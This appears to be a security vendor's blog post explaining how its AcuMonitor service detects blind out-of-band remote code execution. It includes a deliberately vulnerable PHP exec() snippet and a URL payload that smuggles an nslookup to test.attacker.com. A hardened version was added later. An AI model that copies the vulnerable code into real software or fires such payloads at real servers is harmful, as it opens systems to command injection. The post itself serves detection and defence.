Similar to Blind Out-of-band SQL Injection vulnerabilities, AcuMonitor can now detect Blind Out-of-band Remote Code Execution (RCE) vulnerabilities.
Let's consider a vulnerable PHP application that contains the following code:

<?php
// Deliberately vulnerable: the raw query parameter is concatenated into a shell command
$cmd = isset($_GET['1']) ? $_GET['1'] : '';
if ($cmd) {
    exec('ping -c 1 ' . $cmd);   // the command output is never returned to the user
}

This application executes a shell command that is composed from the user input. However, the result of the command execution is not returned to the user.

An attacker could issue a payload such as:

test.php?1=localhost%26nslookup+test.attacker.com%26

When we URL-decode the payload we get the following OS command:

ping -c 1 localhost&nslookup test.attacker.com&

This will force the server to initiate a name lookup (a DNS query) for test.attacker.com.
The attacker can monitor the DNS server logs for such queries to confirm Blind Remote Code Execution vulnerabilities such as this one.
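A hardened form of the snippet above, as an added example that is not part of the original post (validate_host and ping_host are hypothetical names): the input is validated as a host before use, and the value is still quoted with escapeshellarg() so that shell metacharacters such as the '&' in the payload above never reach the shell.

```php
<?php
// Added example, not code from the original post. Two independent controls:
// allow-list validation of the input, plus shell quoting of the final value.

/**
 * Returns the validated host, or null if the value is not a plain host.
 * The payload "localhost&nslookup test.attacker.com&" fails both checks
 * because of the '&' and space characters, so it is rejected before any
 * command is built.
 */
function validate_host(string $value): ?string
{
    // IPv4 or IPv6 literal
    if (filter_var($value, FILTER_VALIDATE_IP) !== false) {
        return $value;
    }
    // RFC 1123 hostname (single label such as "localhost" is allowed)
    if (filter_var($value, FILTER_VALIDATE_DOMAIN, FILTER_FLAG_HOSTNAME) !== false) {
        return $value;
    }
    return null;
}

/**
 * Pings a host once without returning the command output to the caller.
 * Returns true if the input was accepted and the command was run.
 */
function ping_host(string $value): bool
{
    $host = validate_host($value);
    if ($host === null) {
        // Rejected inputs are worth logging: a flood of them is a scan signal.
        error_log('ping_host: rejected input: ' . $value);
        return false;
    }
    // escapeshellarg() wraps the value in single quotes, so even if the
    // validation above were relaxed later the shell would still receive
    // one literal argument rather than a second command.
    exec('ping -c 1 ' . escapeshellarg($host), $output, $status);
    return true;
}

$cmd = isset($_GET['1']) ? $_GET['1'] : '';
if ($cmd !== '') {
    ping_host($cmd);
}
```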

AcuMonitor can now detect such vulnerabilities as well and will send an email alert when such a lookup is observed.

AcuMonitor Blind Out-of-band Remote Code Execution alert

THE AUTHOR
Bogdan Calin